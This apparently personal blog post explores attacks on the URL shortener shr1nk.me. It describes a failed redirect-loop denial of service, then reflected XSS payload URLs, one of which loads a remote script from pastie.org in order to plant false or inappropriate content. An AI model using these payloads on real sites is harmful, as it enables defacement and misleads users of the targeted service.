Ok, first I discovered that I can shrink links from the website itself, so an evil idea came to my mind, a DoS attack, I wanted to make the webserver loop infinitely to find the website. For example I shortened the url http://shr1nk.me/1235 and pointed it to http://shr1nk.me/1234 and vice versa
I thought this would make the server loop over and over to find the original link, but nah, it doesn’t work like that, the server just send the original –the shortened- url back to the browser, and it’s the browser’s work to fetch the new url. So this is useless because even the browser detects redirect loops (5 loops and it break the request) http://en.wikipedia.org/wiki/URL_redirection#Redirect_loops
Now to XSS, a simple check shows that the website is XSS’able, here’s a simple alert() test alert(1)'>http://shr1nk.me/index.php?url="></a><script>alert(1)</script>, it doesn’t work for me in Google Chrome, so Firefox it.
Let’s explore 3 categories of attacks that might be exploited using XSS, of course combining these techniques will have bigger impact.
Reputation :We can make a websites’ reputation as bad as we want, by inserting inappropriate content, or post false news etc.. Remember! users have to click your link to see this, because it is not a persistent XSS attack.
For example if you click this link http://shr1nk.me/index.php?url=%22%3E%3C/a%3E%3Cscript%20src=http://pastie.org/868120.txt%3E%3C/script%3E, you should get something like this.